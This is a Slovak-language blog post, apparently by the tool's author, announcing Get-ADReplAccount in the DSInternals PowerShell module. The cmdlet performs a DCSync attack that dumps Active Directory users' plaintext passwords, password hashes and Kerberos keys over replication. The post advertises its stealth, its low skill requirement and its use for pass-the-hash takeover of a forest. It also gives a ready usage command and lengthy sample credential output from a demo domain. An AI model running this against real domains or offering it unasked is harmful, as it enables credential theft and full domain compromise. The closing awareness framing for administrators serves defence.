Predstavujem Vám príkaz Get-ADReplAccount, najnovší prírastok do môjho PowerShell modulu DSInternals, ktorý umožňuje z doménových kontrolérov na diaľku získať plaintextové heslá, hashe hesiel a Kerberos kľúče všetkých používateľov. Toho dosahuje tým, že simuluje chovanie príkazu dcpromo a cez protokol MS-DRSR si vytvorí repliku všetkých dát v Active Directory databáze. Podľa mojich informácií sa jedná o jediný verejne dostupný nástroj svojho druhu na svete. Ďalej má tieto vlastnosti:

 • Ku svojej činnosti nevyžaduje ani práva doménového správcu. Bohate si vystačí s oprávnením Replicating Directory Changes All, ktoré má napríklad DirSync, Cisco WAAS či zle nakonfigurovaný SharePoint.
 • Otvára dvere dokorán ďalším útokom, ako sú pass-the-hash, pass-the-ticket či PAC spoofing, pomocou ktorých je útočník schopný dostať pod kontrolu celý Active Directory forest. Takéto útoky zvláda napríklad nástroj mimikatz.
 • Nedá sa zablokovať pomocou firewallu, pretože by to základnú funkčnosť Active Directory.
 • V logoch na doménovom radiči zanecháva len minimálnu stopu, ktorú prehliadne väčšina bezpečnostných auditov.
 • Nezneužíva žiadnu bezpečnostnú zraniteľnosť, ktorá by sa dala jednoducho opraviť v rámci aktualizácie systému.
 • Jeho použitie nevyžaduje žiadne špeciálne vedomosti či prípravu. Útočníkovi stačí základná znalosť Active Directory.

Príklad použitia:

Import-Module DSInternals
$cred = Get-Credential
Get-ADReplAccount -SamAccountName April -Domain Adatum -Server LON-DC1 `
-Credential $cred -Protocol TCP

Ukážkový výstup:

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory: 
Enabled: True
Deleted: False
LastLogon: 
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description: 
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory: 
 Hash 01: 92937945b518814341de3f726500d4ff
 Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
 Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory: 
 Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
 Hash 02: 5a5503d0e85f58abaad3b435b51404ee
 Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
 ClearText: Pa$$w0rd
 Kerberos:
  Credentials:
   DES_CBC_MD5
    Key: 76fe3b5bda911a40
  OldCredentials:
   DES_CBC_MD5
    Key: 7f8c4f38e0ea0b80
  Salt: ADATUM.COMApril
  Flags: 0
 KerberosNew:
  Credentials:
   AES256_CTS_HMAC_SHA1_96
    Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
    Iterations: 4096
   AES128_CTS_HMAC_SHA1_96
    Key: a72c8bc96c4a6f03244f0b0067a1e440
    Iterations: 4096
   DES_CBC_MD5
    Key: 76fe3b5bda911a40
    Iterations: 4096
  OldCredentials:
   AES256_CTS_HMAC_SHA1_96
    Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
    Iterations: 4096
   AES128_CTS_HMAC_SHA1_96
    Key: 034b512ec64286dec951d6aff8d81fa8
    Iterations: 4096
   DES_CBC_MD5
    Key: 7f8c4f38e0ea0b80
    Iterations: 4096
  OlderCredentials:
   AES256_CTS_HMAC_SHA1_96
    Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
    Iterations: 4096
   AES128_CTS_HMAC_SHA1_96
    Key: 29d536ec057f9063747161429b81f056
    Iterations: 4096
   DES_CBC_MD5
    Key: 58f1cbe6e50e1f83
    Iterations: 4096
  ServiceCredentials:
  Salt: ADATUM.COMApril
  DefaultIterationCount: 4096
  Flags: 0
 WDigest:
  Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
  Hash 02: c993da396914645b356ae7816251fcb1
  Hash 03: 6b58530cab34de91189a603e22c2be15
  Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
  Hash 05: 5a762cf59fa31023dcba1ebd4725b443
  Hash 06: c78bac91c0ba25cae5d44460fd65a73b
  Hash 07: 59d73cea16afd1aac6bf8acfa2768621
  Hash 08: d2be383db9469a39736d9e2136054131
  Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
  Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
  Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
  Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
  Hash 13: e899e577d5f81ef5288ab67de07fad9a
  Hash 14: 135452ab86d40c3d47ca849646d5e176
  Hash 15: a84c367eaa334d0a4cb98e36da011e0f
  Hash 16: 61a458eb70440b1a92639452f0c2c948
  Hash 17: 238f4059776c3575be534afb46be4ccf
  Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
  Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
  Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
  Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
  Hash 22: f1685383b0c131035ae264ee5bd24a8d
  Hash 23: 3119e42886b01cad00347e72d0cee594
  Hash 24: ebef7f2c730e17ded8cba1ed20122602
  Hash 25: 7d99673c9895e0b9c484e430578ee78e
  Hash 26: e1e20982753c6a1140c1a8241b23b9ea
  Hash 27: e5ec1c63e0e549e49cda218bc3752051
  Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
  Hash 29: 84010d657e6b58ce233fae2bd7644222

Potenciál tohoto útoku (inak nazývaného DCSync) je teda veľký a mal by si toho byť minimálne vedomý každý manažér bezpečnosti a správca Active Directory.